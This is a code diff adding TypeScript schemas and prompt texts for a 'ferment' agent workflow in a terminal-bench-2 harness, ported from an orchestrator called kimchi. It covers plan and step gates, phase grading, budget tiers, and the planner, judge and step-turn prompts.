+/** kimchi's `ScopeParams`, minus `ferment_id`. */
+export const planSchema = Type.Object({
+	title: Type.String({ description: "Required concise 3-5 word title for this ferment." }),
+	goal: Type.String({ description: "The ferment goal — what the task asks for, in one sentence." }),
+	success_criteria: Type.Array(Type.String(), {
+		minItems: 1,
+		description: "Observable acceptance criteria. Each item must be one concrete, verifiable criterion.",
+	}),
+	constraints: Type.Optional(
+		Type.Array(Type.String(), { description: "Technical constraints implied by the intent." }),
+	),
+	assumptions: Type.Optional(
+		Type.String({
+			description:
+				"A single concise prose paragraph covering all upfront assumptions the plan rests on. If an assumption is later found false, record it and continue rather than stopping.",
+		}),
+	),
+	phases: Type.Array(phaseSchema, {
+		minItems: 1,
+		maxItems: 7,
+		description:
+			"1-7 ordered phases. Default to ONE phase for simple tasks and put setup, implementation, persistence, filtering, polish, and verification in that phase's steps. Add another phase only for a real vertical slice/tracer bullet, materially different complexity/risk tier, independent parallel workstream, or distinct code locality. Do not create phases just for setup, directory creation, CRUD vs polish, deciding scope, writing the plan, or to make the plan look organized. If questions is non-empty, keep phases answer-agnostic and provisional.",
+	}),
+	questions: Type.Array(questionSchema, {
+		maxItems: 3,
+		description:
+			"Emit ONLY for decision-blocking uncertainty where the answer materially changes architecture, dependencies, data model, user-facing scope, security posture, deployment/runtime assumptions, or verification strategy. At most 3. Do not ask about defaults you can safely choose. Empty array when nothing is decision-blocking.",
+	}),
+	gates: gateArray(PLAN_GATES, CANONICAL_VERDICTS),
+})
+
+/** kimchi's `RefineParams.steps` — only reached for a phase the plan left with no steps. */
+export const refineSchema = Type.Object({
+	steps: Type.Array(stepSchema, { minItems: 1, description: "3-6 concrete steps for this phase." }),
+})
+
+/** One planned step, as the workflow passes it around. */
+export type PlannedStep = Static<typeof stepSchema>
+export type PlannedPhase = Static<typeof phaseSchema>
+
+/**
+ * What a `.foreach` hands its body: the item itself, declared so the body's first step can
+ * validate it and every later step in that item can read it back by name.
+ */
+export const phaseItemSchema = Type.Object({ index: Type.Number(), total: Type.Number(), phase: phaseSchema })
+export const stepItemSchema = Type.Object({ index: Type.Number(), total: Type.Number(), step: stepSchema })
+export type PhaseItem = Static<typeof phaseItemSchema>
+export type StepItem = Static<typeof stepItemSchema>
+
+/** What running a step's verify command produced — kimchi's `StepResult`, minus the persistence fields. */
+export const verifyResultSchema = Type.Object({
+	ran: Type.Boolean({
+		description:
+			"False when the command never ran: the step declared none, or the completion self-flagged and kimchi refuses such a call before it reaches verification.",
+	}),
+	command: Type.String(),
+	exitCode: Type.Number(),
+	stdout: Type.String(),
+	stderr: Type.String(),
+})
+export type VerifyResult = Static<typeof verifyResultSchema>
+
+// -- Per-turn outputs -------------------------------------------------------------------------------
+
+/**
+ * kimchi's `submit_agent_report` parameters, unchanged — a dispatched worker's final structured report.
+ *
+ * One reader is left: the phase rework, which is the only turn in this workflow still handed to an agent
+ * of its own. A step no longer produces one, because a step is no longer dispatched — the orchestrator
+ * does the work and answers {@link stepGatesSchema} for it, which is the payload kimchi's own one-shot
+ * runs produce.
+ */
+export const workerReportSchema = Type.Object({
+	status: Type.Union([Type.Literal("completed"), Type.Literal("partial"), Type.Literal("blocked")], {
+		description:
+			'A completed report must use remaining_steps: []. Use "partial" if work remains, "blocked" if something stopped you.',
+	}),
+	summary: Type.String(),
+	steps_completed: Type.Array(Type.String()),
+	remaining_steps: Type.Array(Type.String(), {
+		description: "Empty for a completed report; at least one entry for a partial one.",
+	}),
+	files_touched: Type.Optional(Type.Array(Type.String())),
+	verification: Type.Optional(Type.Array(Type.String())),
+	blockers: Type.Optional(Type.Array(Type.String(), { description: "At least one entry for a blocked report." })),
+	notes: Type.Optional(Type.String()),
+})
+
+/**
+ * kimchi's `CompleteStepParams`, minus the ids and the `worker_agent_id` that turns out never to be set.
+ *
+ * `worker_agent_id` is worth a paragraph, because it settles WHO does a step and who answers for it. It
+ * is OPTIONAL — "Omit when the orchestrator executed the step directly (no subagent was spawned)" — and
+ * `validateLinkedWorker` (tools/steps.ts:146) skips its checks outright "when worker_agent_id is omitted,
+ * the orchestrator executed the step directly". `start_ferment_step` offers the choice in so many words:
+ * "Either spawn a subagent … or execute the step directly using bash/edit/write. … If you executed
+ * directly, call complete_ferment_step with just the summary and gates".
+ *
+ * One-shot ferment takes the second branch, always. Across six live native runs every one of the 31
+ * `complete_ferment_step` calls omitted `worker_agent_id`, and the orchestrator session itself made 108
+ * `bash`, 16 `write` and 13 `edit` calls and spawned no agent at all. So this payload is written by the
+ * agent that did the work, about the work it just did — which is why the registry's second person reads
+ * as it does, and why the port's step turn is one agent rather than a worker plus a reviewer.
+ */
+export const stepGatesSchema = Type.Object({
+	summary: Type.String({ description: "Short summary of what this step accomplished, for the steps that follow it." }),
+	gates: gateArray(STEP_GATES, STEP_VERDICTS),
+})
+
+/** kimchi's `complete_ferment_phase` gate payload. */
+export const phaseGatesSchema = Type.Object({
+	summary: Type.String({ description: "What this phase accomplished, in one or two sentences." }),
+	gates: gateArray(PHASE_GATES, CANONICAL_VERDICTS),
+})
+
+/** kimchi's `complete_ferment` gate payload. */
+export const shipGatesSchema = Type.Object({
+	summary: Type.String({ description: "What the ferment delivered, in one or two sentences." }),
+	gates: gateArray(SHIP_GATES, CANONICAL_VERDICTS),
+})
+
+/**
+ * kimchi's phase grader reply (`judgePhaseGradeViaSubagent` → `parseGraderResponse`).
+ *
+ * This one is NOT advisory, and that is easy to misread: the docstring on `graderSpawner` says judge
+ * *failure* modes are advisory, while the grade itself drives advancement — "A/B advance, C/D/F refuse
+ * and route through the existing MAX_BLOCK_RETRIES / escalation loop" (judge.ts).
+ */
+export const phaseGradeSchema = Type.Object({
+	grade: Type.Union([Type.Literal("A"), Type.Literal("B"), Type.Literal("C"), Type.Literal("D"), Type.Literal("F")]),
+	rationale: Type.String(),
+	recommendations: Type.Array(Type.String(), {
+		description:
+			"Concrete fixes that would reach an A. Each entry says what is wrong, why it matters, what must change, and what evidence would prove the fix. Empty for an A.",
+	}),
+})
+export type PhaseGrade = Static<typeof phaseGradeSchema>
+
+/** kimchi's `MAX_BLOCK_RETRIES` (state.ts): reworks a refused phase gets before the grade is accepted anyway. */
+export const MAX_BLOCK_RETRIES = 3
+
+/** kimchi's bar: an A on the first attempt, a B once the phase has been reworked (`minimumAcceptableGrade`). */
+export function minimumAcceptableGrade(priorRetries: number): "A" | "B" {
+	return priorRetries === 0 ? "A" : "B"
+}
+
+const GRADE_ORDER: Record<string, number> = { A: 5, B: 4, C: 3, D: 2, F: 1 }
+
+/** True when the grader's verdict is below the bar for this attempt — kimchi's `judgeRefused`. */
+export function gradeRefuses(grade: string | undefined, priorRetries: number): boolean {
+	if (grade === undefined) return false // judge unavailable is advisory: it does NOT refuse advancement
+	return (GRADE_ORDER[grade] ?? 0) < (GRADE_ORDER[minimumAcceptableGrade(priorRetries)] ?? 0)
+}
+
+/** kimchi's `ASK_USER_FORM_MAX_ATTEMPTS`: tries at the judge before falling back to defaults. */
+export const ASK_USER_FORM_MAX_ATTEMPTS = 3
+
+/**
+ * kimchi's `defaultAnswerForQuestion`, ported verbatim in behaviour.
+ *
+ * The point is that an unreachable judge must not leave a decision unmade: "this prevents transient
+ * judge failures from killing a ferment run". Confirm defaults to yes, single/multi to the first option
+ * (the agent listed them in priority order), text to an explicit non-answer.
+ */
+export function defaultAnswerForQuestion(question: {
+	id: string
+	type?: string
+	options?: readonly { id: string; label: string }[]
+}): { id: string; value: string } {
+	if (question.type === "confirm") return { id: question.id, value: "yes" }
+	const first = question.options?.[0]
+	if ((question.type === "single" || question.type === "multi") && first) return { id: question.id, value: first.id }
+	return { id: question.id, value: "(no answer — judge was unavailable)" }
+}
+
+/** kimchi's `askJudgeForm` reply: `{"answers":[{"id":...,"value":...}],"rationale":"..."}`. */
+export const judgeAnswersSchema = Type.Object({
+	answers: Type.Array(Type.Object({ id: Type.String(), value: Type.String() })),
+	rationale: Type.String({ description: "One sentence justifying the answers." }),
+})
+
+/** kimchi's `judgeStepVerification` reply — verbatim, including the fail-safe bias. */
+export const verifyTriageSchema = Type.Object({
+	verdict: Type.Union([Type.Literal("pass"), Type.Literal("retry"), Type.Literal("fail")]),
+	reason: Type.String({ description: "One sentence." }),
+})
+
+// -- Budgets ----------------------------------------------------------------------------------------
+
+/**
+ * kimchi's `FERMENT_WORKER_BUDGETS`, verbatim (src/extensions/agents/worker-budget-policy.ts).
+ *
+ * **These numbers are ADVICE here, not boxes, and that is what kimchi does with them too.** Its
+ * `limitsHint` is appended to every `start_ferment_step` result regardless of which branch the
+ * orchestrator takes, and on the branch it actually takes — executing the step itself — there is no
+ * `Agent` call for "set all three execution limits exactly on the Agent call" to apply to. The tier
+ * describes the shape of the work ("narrow for verification or one small edit … complex for multi-file
+ * builds"), and the only thing that ever stops the turn is the run's own deadline. So the tier is
+ * rendered into the step turn's prompt exactly as kimchi renders it, and nothing enforces it.
+ *
+ * An earlier version of this port DID enforce it, as `maxDurationMs` on a dispatched worker step, and
+ * grew a tier ladder to escalate a worker killed at its cap. Both are gone with the worker: there is no
+ * separate process to box when the orchestrator does the work in its own session.
+ *
+ * `cumulativeTokenBudget` has no counterpart either: it bounded a worker plus its resumptions.
+ */
+export const FERMENT_WORKER_BUDGETS = {
+	narrow: { maxTurns: 10, maxDuration: 180, tokenBudget: 50_000 },
+	standard: { maxTurns: 25, maxDuration: 300, tokenBudget: 100_000 },
+	complex: { maxTurns: 30, maxDuration: 600, tokenBudget: 150_000 },
+} as const
+
+export type BudgetTier = keyof typeof FERMENT_WORKER_BUDGETS
+
+export function budgetTier(tier: string | undefined): BudgetTier {
+	return tier === "narrow" || tier === "complex" ? tier : "standard"
+}

--- a/benchmark/terminal-bench-2/workflows/ferment/prompts.ts
+++ b/benchmark/terminal-bench-2/workflows/ferment/prompts.ts
@@ -1,0 +1,713 @@
+/**
+ * What each step is told — ported from kimchi's one-shot ferment, as literally as the medium allows.
+ *
+ * The rule applied throughout: **instruction text is kept, orchestration text is dropped.** A sentence
+ * that tells the model what good work looks like is prompt; a sentence that tells it which tool to call
+ * next, or that it must not stall between turns, is the ferment's continuation machinery — the nudges
+ * (`nudge.ts`, `scheduler.ts`, `lifecycle-obligation-guard.ts`) whose entire job is to make one long
+ * session behave like a state machine. Here the state machine IS the engine, so that half is deleted
+ * rather than translated: no "call X now", no "Next action:" lines, no turn discipline, no stop nudges.
+ *
+ * Provenance, file by file in the kimchi checkout:
+ *  - `SHARED_PLANNING_PROCESS` — src/shared/planning/shared-planning-process.ts, verbatim.
+ *  - `planPrompt` — src/extensions/ferment/oneshot.ts (`buildOneshotNudge`), minus its tool-call
+ *    choreography and its "## Turn discipline" section.
+ *  - `judgeSystemPrompt` / `judgePrompt` — src/extensions/ferment/ask-user.ts (`ASK_USER_FORM_SYSTEM`,
+ *    `buildAskJudgeFormUserMsg`).
+ *  - `refinePrompt` — engine.ts's `refine` action prose + `RefineParams`.
+ *  - `stepTurnPrompt` — one prompt from what is one kimchi TURN: `start_ferment_step`'s result
+ *    (`planFirstPreamble`, the direct-execution branch, the limits hint) plus `buildWorkerContext`
+ *    (worker-prompt.ts) plus `complete_ferment_step`'s description and the S gates.
+ *  - `phaseGatesPrompt` / `shipPrompt` — the two remaining completion tools' descriptions, plus the gate
+ *    registry's own question/guidance text (see contract.ts).
+ *  - `verifyTriagePrompt` — judge.ts (`STEP_VERIFICATION_SYSTEM`), verbatim.
+ *
+ * **Nothing here is invented any more, and two things that were have been removed.** `stepEvidenceBlock`
+ * pasted a gathered step diff into a gate turn, and `landingInstruction` told a dispatched worker to stop
+ * working at 75% of its box and file its report while it still could. Both were real repairs to a real
+ * cost, and both were repairing a shape kimchi does not have: a subagent per step, ruled on afterwards by
+ * a turn that had not watched it. Six live one-shot runs say kimchi dispatches nobody — 31 of 31
+ * `complete_ferment_step` calls with `worker_agent_id` absent, 108 `bash` / 16 `write` / 13 `edit` calls
+ * made by the orchestrator itself, 0 agent spawns — so the worker is gone and both props went with it.
+ * A turn that does its own work has no report to land and no diff to be handed.
+ */
+import type { Static } from "typebox"
+import {
+	type BudgetTier,
+	FERMENT_WORKER_BUDGETS,
+	type judgeAnswersSchema,
+	PHASE_GATES,
+	type PhaseGrade,
+	PLAN_GATES,
+	type PlannedStep,
+	type planSchema,
+	renderGateGuidance,
+	SHIP_GATES,
+	STEP_GATES,
+} from "./contract.ts"
+import type { DiffEvidence } from "./verify.ts"
+
+type Plan = Static<typeof planSchema>
+type JudgeAnswers = Static<typeof judgeAnswersSchema>
+
+/** Verbatim from kimchi's src/shared/planning/shared-planning-process.ts. */
+export const SHARED_PLANNING_PROCESS = `Follow five steps IN ORDER. Do NOT get stuck on any step.
+Your goal is to reach a complete, well-scoped plan, not to understand every file in the project.
+
+STEP 1 — ORIENT (lightweight research, MAX 2 TURNS)
+Read the user's intent. Before asking anything, build MINIMAL context:
+- Do a quick project scan: file listing, README, package/config files (1-2 tool calls).
+- Form an initial mental model: what kind of task is this? What technology and patterns?
+- Identify your unknowns: what assumptions are you making? What decisions can only the user make?
+- If the project is greenfield (no existing codebase) or the task is non-code (writing, strategy, general planning), note that and move on immediately.
+
+Default budget: spend about 1-2 turns on Orient and aim for 3-5 targeted files. Exceed this only
+for a specific unknown that would materially change the interview questions or plan. Do NOT read
+implementation files line by line — save that for Step 4 (Deep Exploration) which happens AFTER
+the interview and criteria confirmation.
+
+This step is about YOUR understanding, not the user's. Do not ask questions yet.
+
+STEP 2 — INTERVIEW (iterative rounds)
+Ask the user about the unknowns you identified in Step 1. Run in rounds:
+
+Round structure:
+  a. Ask 1-3 focused questions using your mode's structured Q&A tool.
+     When presenting options, allow free-form alternatives and include "None of the above"
+     for predefined choices.
+  b. When answers come back, REFLECT before continuing:
+     - How do these answers change your understanding of the task?
+     - Do you need to check anything in the codebase to validate or act on an answer?
+       If so, do a quick targeted lookup (grep, short read) — keep it narrow.
+     - Does this introduce new assumptions or new questions?
+  c. If new questions emerged, ask them in the next round.
+  d. If scope is clear and no question would change the approach, exit the loop.
+
+When to ask:
+- You are making an assumption that could be wrong and would change the approach.
+  Surface it explicitly: "I'm assuming X — is that right, or should I do Y instead?"
+- The intent is ambiguous between 2+ interpretations you genuinely can't resolve.
+- There is a decision only the user can make (auth provider, DB choice, public vs internal, etc.).
+
+When NOT to ask:
+- The intent is already clear and specific — don't make the user repeat themselves.
+- There is a safe, reversible default. Pick it, note it in assumptions, move on.
+- The question is generic ("Any edge cases?", "What about error handling?").
+  If you suspect a specific edge case, name it and ask about THAT.
+
+Exit criteria: you can explain in one sentence what you're building, why, and how
+you'll know it's done — and no remaining question would change the approach.
+If the intent was unambiguous from Step 1 and you have no genuine uncertainties,
+skip this step entirely — don't manufacture questions.
+
+STEP 3 — COMPLETION CRITERIA
+Draft concrete completion criteria and validation steps, then confirm with the user.
+- State what "done" looks like in specific, testable terms.
+- Include the verification method for each criterion (test command, manual check, linter, etc.).
+- Use your mode's confirmation mechanism to present the criteria.
+- Proceed only when user confirms criteria are correct.
+- If the user already stated clear acceptance criteria in their intent, confirm them
+  rather than rephrasing. Don't over-formalize obvious criteria.
+- Confirm criteria with the user BEFORE proceeding to exploration.
+
+STEP 4 — DEEP EXPLORATION (targeted, not broad, MAX 2 TURNS of direct reads)
+Now investigate the codebase for implementation-specific details.
+- Focus ONLY on unknowns that remain after the interview — don't re-explore what you
+  already learned in Step 1.
+- Prefer targeted search over reading entire files line by line. Find the specific
+  lines you need.
+- If you read files directly, limit to at most 2 turns of reads.
+- Skip this step for greenfield tasks with no existing codebase; record why in assumptions.
+- Skip entirely if you have enough context from Steps 1-3 to write a plan.
+- After exploration, verify your understanding and look for gaps.
+
+STEP 5 — PLAN
+Synthesize everything — orient findings, interview answers, confirmed criteria,
+and exploration results — into a structured plan.
+- Ensure completion criteria were confirmed with the user before finalizing.
+- Do NOT finalize the plan while any open question remains unresolved.
+- Use your mode's completion mechanism to submit the plan for user review.
+
+Every plan must use this structure:
+
+## Goal
+One-sentence statement of what the plan achieves.
+
+## Constraints
+List non-negotiable requirements (e.g., "no new dependencies", "preserve existing API").
+
+## Chunks
+Ordered, independently-verifiable units of work. Each chunk has:
+- **Scope**: what it covers (file paths, components)
+- **Files Changed**: every file created, modified, or deleted — use concrete paths, not globs
+- **Depends On**: which prior chunk(s) it requires
+- **Accept When**: 2-3 concrete, verifiable criteria
+- **Test Coverage**: which test files need creation or update for this chunk
+- **Open Questions**: explicitly list any unknowns or assumptions (never leave implicit)
+
+Step sizing rule: every step should fit within ~25% of the active model's context window when implemented, including its tool output. If you cannot see how to fit a step within that budget, split it into smaller steps.
+
+## Verification Strategy
+How to confirm each chunk is correct (test command, manual check, etc.).
+
+## Decision Log
+Tracked choices with rationale and rejected alternatives noted.
+
+## Risks
+Named risks with likelihood and mitigation approach.
+
+Assumption rule: you are encouraged to make assumptions when planning — exploration often requires
+educated guesses. However, every assumption must be surfaced explicitly and resolved with the user
+before the plan is finalized. Add unresolved assumptions to the relevant chunk's Open Questions,
+use your mode's Q&A tool to confirm them, then move confirmed ones to the Decision Log.
+Do not present the plan as final while any Open Question remains unresolved.
+
+Self-validation: after writing the plan, re-read it and cross-check against the completion criteria.
+For each chunk, verify: (1) Files Changed lists concrete paths, not vague descriptions, (2) Accept
+When criteria are testable and specific, (3) no implicit assumptions remain unrecorded. Flag and
+fix any gaps before submitting the plan for review.
+
+Common plan anti-patterns to avoid:
+- Chunks that say "refactor X" without listing which files change and how
+- Accept When criteria that are just "it works" or "tests pass" without naming the specific test
+- Every chunk depending on the previous one when some could be parallel
+- Exploration or discovery as an implementation chunk — that belongs in Steps 1/4, not in the plan
+- Verification Strategy that is identical for every chunk instead of chunk-specific`
+
+/**
+ * The planner, i.e. kimchi's one-shot envelope.
+ *
+ * Two things it no longer says, both deliberate. The tool-call sequence ("call scope_ferment", "for each
+ * phase call activate_ferment_phase, then for each step call start_ferment_step...") is replaced by a
+ * description of what the ENGINE will do with the plan — same execution model, but it is not this step's
+ * job to drive it. And the whole "## Turn discipline" section is gone: it exists to stop a single session
+ * from halting between lifecycle calls, which cannot happen when each stage is its own step.
+ */
+export function planPrompt(args: {
+	intent: string
+	answers?: JudgeAnswers
+	questionsAsked?: readonly { id: string; question: string }[]
+}): string {
+	const { intent, answers, questionsAsked } = args
+
+	const answered =
+		answers && answers.answers.length > 0
+			? [
+					"",
+					"## Answers from the judge",
+					"",
+					"You asked for a decision and it has been made — these answers are final; do not ask them again.",
+					...answers.answers.map((answer) => {
+						const asked = questionsAsked?.find((question) => question.id === answer.id)
+						return `- ${asked ? asked.question : answer.id}: ${answer.value}`
+					}),
+					`Rationale: ${answers.rationale}`,
+					"",
+					"Fold them into the plan and return it now. Ask only NEW decision-blocking questions; never repeat answered ones.",
+				].join("\n")
+			: ""
+
+	return `You are running a one-shot ferment.
+
+User intent: "${intent}"
+
+## Your job
+
+Follow the shared planning process below. The only differences from interactive ferment scoping are:
+- **Interview**: put anything decision-blocking in \`questions\` — they are automatically routed to a judge that stands in for the user. You do not need to do anything special.
+- **Completion Criteria**: there is no confirmation turn in one-shot mode. Draft criteria from the intent and include them directly in \`success_criteria\`.
+- Then return the complete plan.
+
+${SHARED_PLANNING_PROCESS}
+
+## One-shot execution
+
+1. **Return the plan** with:
+   - title: concise 3-5 word name derived from the task
+   - goal: what the task asks for, in one sentence
+   - success_criteria: observable, verifiable outcomes
+   - constraints: technical constraints implied by the intent
+   - phases: the smallest useful ordered plan — usually 1–3 phases with 1–4 steps each; every step must have a description and, where possible, a verify bash command
+   - gates: exactly ${PLAN_GATES.join(", ")} — each with id, verdict, rationale, evidence
+
+2. **For each phase**, each step becomes ONE turn that does the work with bash/edit/write and then
+   answers the step-scope gates on what it did — so give every step an explicit budget_tier chosen from
+   the scoped work shape: narrow for verification or one small edit; standard (normal implementation
+   default); complex for multi-file builds or iterative debugging. After the gates, the step's verify
+   command is run for real. A flagged gate or a failed verification does not advance the step.
+
+3. **When all phases are done**, the ferment-scope gates decide whether it ships, against the ${PLAN_GATES[2]}
+   checklist you declare here.
+
+## Plan-scope gates
+
+You must produce verdicts for the three plan-scope gates below.
+
+${renderGateGuidance(PLAN_GATES)}
+
+## Toolset
+
+This step PLANS; it does not implement. Use read-only research tools only — read, grep, find, ls, and
+non-mutating shell commands. Do not edit, create, delete, move, or install anything: the work belongs to
+the steps, and anything done here is work no gate ever sees.${answered}`
+}
+
+/** Verbatim from kimchi's `ASK_USER_FORM_SYSTEM` (src/extensions/ferment/ask-user.ts). */
+export const judgeSystemPrompt = `You are standing in for the user during an autonomous ferment run. A planner agent has reached decision points it cannot resolve from context alone and is asking a structured form. There is no human available — you decide.
+
+Your bias:
+- Choose answers that best serve the ferment's stated goal and success criteria, NOT whatever moves work forward fastest.
+- When two answers seem equivalent, prefer the more conservative one (less destructive, more revertible).
+- When you genuinely cannot tell, choose or write the answer that preserves optionality.
+
+For single questions, "value" MUST be one provided option id unless allowOther is true.
+For confirm questions, "value" MUST be "yes" or "no".
+For multi questions, "value" MUST be a comma-separated list of provided option ids unless allowOther is true.
+For text questions, "value" MUST be a concise directly usable string.
+Every question must be answered.
+
+Decide from what you are shown. In kimchi this judge is a single model call with no tools at all, so do not run commands or read files — answer the form.`
+
+/** kimchi's `buildAskJudgeFormUserMsg`, with the ferment record replaced by the plan draft. */
+export function judgePrompt(args: { intent: string; plan: Plan | undefined }): string {
+	const { intent, plan } = args
+	const questions = plan?.questions ?? []
+	return [
+		judgeSystemPrompt,
+		"",
+		`Ferment: "${plan?.title ?? "(untitled)"}"`,
+		`Goal: ${plan?.goal ?? "(none specified)"}`,
+		`Success criteria: ${plan?.success_criteria?.join("; ") || "(none specified)"}`,
+		`User intent: "${intent}"`,
+		"",
+		"Questions:",
+		JSON.stringify(questions, null, 2),
+		"",
+		"Answer every question with the id it was asked under.",
+	].join("\n")
+}
+
+/** engine.ts's `refine` action prose, plus the step-shape rules from `RefineParams`. */
+export function refinePrompt(args: {
+	intent: string
+	plan: Plan | undefined
+	phaseIndex: number
+	phaseCount: number
+	phase: { name: string; goal: string }
+}): string {
+	const { intent, plan, phaseIndex, phaseCount, phase } = args
+	return [
+		`Break phase ${phaseIndex} "${phase.name}" into 3–6 concrete steps.`,
+		"",
+		`Phase ${phaseIndex}/${phaseCount}: ${phase.name} — ${phase.goal}`,
+		`Ferment: ${plan?.title ?? "(untitled)"}`,
+		`Goal: ${plan?.goal ?? intent}`,
+		plan?.success_criteria?.length ? `Criteria: ${plan.success_criteria.join("; ")}` : "",
+		"",
+		"Each step needs a description that can be acted on without anything else being spelled out, and a",
+		"verify bash command that exits 0 on success wherever one is possible. Steps run in the order you",
+		"give them; a step's budget_tier says what shape of work it is.",
+		"",
+		"This step PLANS; it does not implement. Read-only commands only.",
+	]
+		.filter((line) => line !== "")
+		.join("\n")
+}
+
+/**
+ * ONE step, ONE turn: do the work, then answer for it — kimchi's `start_ferment_step` result and its
+ * `complete_ferment_step` description, addressed to the single agent that receives both.
+ *
+ * ## Why this is one prompt and not two
+ *
+ * This port used to dispatch a worker subagent per step and have a separate turn rule on its report.
+ * kimchi's one-shot ferment dispatches nobody. `start_ferment_step` offers both branches in so many
+ * words — "Either spawn a subagent … or execute the step directly using bash/edit/write. … If you
+ * executed directly, call complete_ferment_step with just the summary and gates (worker_agent_id is
+ * optional)" — and six live native runs take the second one every time: 31 of 31 completions with
+ * `worker_agent_id` absent, and the orchestrator session itself spending 108 `bash`, 16 `write` and 13
+ * `edit` calls with zero agent spawns.
+ *
+ * That is why the S gates are written the way they are. "Read **your own** summary", "Classify **your
+ * own** verify command honestly", "would make **your** work fail" — the second person is not a register,
+ * it is the actual arrangement. The agent answering S1 is the agent whose edits S1 is about, and it wants
+ * the step to land, which is what makes an honest flag mean something.
+ *
+ * ## What it is handed, and what it is not
+ *
+ * Handed: the plan, the phase, this step, what earlier steps left behind (kimchi's `Prior:` line), the
+ * tier as advice, and the step's start ref. That last one is exactly what kimchi gives its orchestrator —
+ * `stepStartRefs` "captured at start_ferment_step, consumed at complete_ferment_step for diff evidence"
+ * (runtime-state-store.ts:11), surfaced as a SHA in derived state (derive-state.ts:150). A gathered diff
+ * used to be pasted in here; it is not any more, because the agent reading this made the edits itself and
+ * one `git diff <ref>` is cheaper than 12KB of context in a session that accumulates the whole run.
+ *
+ * Not handed, on a re-entry: any of the above again. The step is `resumable` on the orchestrator's own
+ * session, so a re-entry is the same conversation continuing — it says only what CHANGED, which is what
+ * a kimchi tool error says.
+ */
+export function stepTurnPrompt(args: {
+	plan: Plan | undefined
+	phaseIndex: number
+	phaseCount: number
+	phase: { name: string; goal: string; constraints?: readonly string[] }
+	stepIndex: number
+	stepCount: number
+	step: PlannedStep
+	tier: BudgetTier
+	priorSteps: readonly { index: number; description: string; summary: string }[]
+	/** The commit this step started from, so `git diff <ref>` is one call away — kimchi's `stepStartRef`. */
+	startRef?: string
+	/**
+	 * Why this step was not accepted last time, when it wasn't. Two shapes, and kimchi distinguishes them:
+	 * a flagged gate is a refusal of the completion CALL, raised before anything was recorded; anything
+	 * else — a verification the triage judge called real, a turn that produced nothing — is the step
+	 * itself coming back. Both land in the same session, which is the point.
+	 */
+	previous?: {
+		reason: string
+		flags: readonly { id: string; rationale: string; evidence: string }[]
+		verify?: { command: string; exitCode: number; stdout: string; stderr: string }
+	}
+}): string {
+	const { plan, phaseIndex, phaseCount, phase, stepIndex, stepCount, step, tier, priorSteps, startRef, previous } = args
+	const limits = FERMENT_WORKER_BUDGETS[tier]
+
+	// kimchi's refusal for a self-flagged completion, and it means here exactly what it means there: this
+	// one call is refused, nothing was recorded, and the agent that flagged has to resolve the underlying
+	// issue and call again (tools/steps.ts:427). It is the SAME session, still holding the work it did, so
+	// "resolve it yourself" is an instruction it can actually carry out.
+	if (previous && previous.flags.length > 0) {
+		return [
+			gateRefusalText({
+				what: `Step ${stepIndex}: "${step.description}"`,
+				flags: previous.flags,
+				recall: "complete the step again",
+			}),
+			"",
+			"You did this work and you flagged it, in this conversation. Nothing else has moved: no other agent",
+			"ran, and the machine is exactly as you left it. So resolving what you flagged is your own turn, and",
+			"it is the only way this step can still land.",
+			"",
+			"Do one of these, then answer the gates again:",
+			"  - fix the underlying issue with your tools, then vote 'pass' citing what you changed;",
+			"  - look again, and vote 'pass' if the machine does not actually have the problem you named;",
+			"  - vote 'omitted' with a rationale, when the gate genuinely does not apply to this step.",
+			"",
+			"Flagging a gate that does not apply keeps finished work from ever being recorded.",
+			"",
+			renderGateGuidance(STEP_GATES),
+		].join("\n")
+	}
+
+	// The step itself coming back: the verification ran and failed, or the turn produced nothing. kimchi's
+	// rule for a continuation is the one it gives for an exhausted worker, and it survives the merge intact
+	// because it was never about the box — "do not raise the limits and retry the same broad task".
+	if (previous) {
+		const ran = previous.verify
+		return [
+			"THIS STEP WAS NOT ACCEPTED, AND THIS IS A BOUNDED CONTINUATION OF YOUR OWN EARLIER ATTEMPT.",
+			`Reason: ${previous.reason}`,
+			...(ran
+				? [
+						`  $ ${ran.command}`,
+						`  exit ${ran.exitCode}`,
+						`  stdout: ${clip(ran.stdout)}`,
+						`  stderr: ${clip(ran.stderr)}`,
+					]
+				: []),
+			"",
+			"Fix the underlying cause and finish the remaining work — do not widen the task, and do not start over.",
+			"Then answer the three step-scope gates again, on what the step now leaves behind.",
+			"",
+			renderGateGuidance(STEP_GATES),
+		].join("\n")
+	}
+
+	const prior =
+		priorSteps.length > 0
+			? `Prior: ${priorSteps.map((s) => (s.summary ? `✓${s.index} "${s.description}" — ${s.summary}` : `✓${s.index} "${s.description}"`)).join("; ")}`
+			: ""
+
+	const context = [
+		"## Worker Context",
+		`Ferment: ${plan?.title ?? "(untitled)"}`,
+		`Phase ${phaseIndex}/${phaseCount}: ${phase.name} — ${phase.goal}`,
+		`Step ${stepIndex}/${stepCount}: ${step.description}`,
+		step.verify ? `verify: ${step.verify}` : "",
+		"",
+		"Write no reports, notes, or scratch files: return decision-ready findings in your summary instead. Do NOT create ad-hoc project-root scratch folders unless the task explicitly asked for a product artifact.",
+		plan?.goal ? `\nGoal: ${plan.goal}` : "",
+		plan?.success_criteria?.length ? `Criteria: ${plan.success_criteria.join("; ")}` : "",
+		phase.constraints?.length ? `Constraints: ${phase.constraints.join("; ")}` : "",
+		prior,
+	]
+		.filter((line) => line !== "")
+		.join("\n")
+
+	const planFirst = [
+		"📋 Plan first (every start of this step):",
+		"• Write a brief 2-4 bullet inline plan for this step's work.",
+		"• Include a verification sub-task that checks exact expected output, not just substring grep. Match the verify command's precision.",
+		"• If the step compiles or builds artifacts, include a cleanup sub-task to remove intermediate files from output directories.",
+		priorSteps.length > 0
+			? `• Prior steps: ${priorSteps.map((s) => `✓${s.index} "${s.description}"`).join("; ")}. Build on their output.`
+			: "",
+	]
+		.filter((line) => line !== "")
+		.join("\n")
+
+	// kimchi's `stepStartRef`, and the whole of what a step turn is given about its own diff. S1 asks for
+	// the diff line behind every claim; naming the ref makes that one command instead of an archaeology.
+	const ref = startRef
+		? `This step starts at git ref ${startRef}. \`git diff ${startRef}\` is exactly what it changed — S1 wants the line behind each claim, and that is where to cite it from.`
+		: "This working directory is not a git repository (or git could not read it), so there is no diff to cite. Say so in your S1 evidence and cite what you can show instead."
+
+	return `${planFirst}
+
+${context}
+
+Selected worker budget: budget_tier=${tier}, max_turns=${limits.maxTurns}, max_duration=${limits.maxDuration}s, token_budget=${limits.tokenBudget}. Select the tier from the scoped work shape; never infer it from description keywords.
+
+Execute this step directly, using bash/edit/write. Do its work, then run its verification yourself and fix what fails.
+
+${ref}
+
+Then answer for what you did. You must produce verdicts for the three step-scope gates below, on your own work — a "flag" verdict refuses this completion and comes straight back to you to resolve.
+
